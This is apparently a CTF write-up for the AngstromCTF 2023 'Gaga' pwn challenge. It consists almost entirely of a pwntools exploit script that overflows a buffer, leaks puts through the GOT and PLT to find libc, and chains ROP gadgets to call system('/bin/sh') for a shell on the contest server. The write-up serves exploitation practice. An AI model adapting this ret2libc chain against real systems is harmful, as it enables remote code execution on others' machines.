Gaga - AngstromCTF 2023

ROP gadget, GOT & PLT, Buffer Overflow

from pwn import *

r = remote("challs.actf.co", 31302)
#r = process("./gaga2")
elf = ELF('./gaga2')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so')
context.clear(os = "linux", arch='x86_64', log_level="debug")

r.recv()
pop_rdi = 0x00000000004012b3
ret = 0x000000000040101a
payload = flat(b'A' * 72,pop_rdi,elf.got['puts'],elf.plt['puts'],elf.symbols["main"],)
r.sendline(payload)

puts_leak = u64(r.recv(6) + b'\x00\x00')

libc.address = (puts_leak - libc.sym["puts"])

payload = flat(b"A" * 72,ret,pop_rdi,next(libc.search(b"/bin/sh")),libc.sym["system"])
r.sendline(payload)
r.interactive()

PreviousRET to PLT (leak function - ASLR)NextVip_at_libc (Pwnme 2023)

Last updated 1 year ago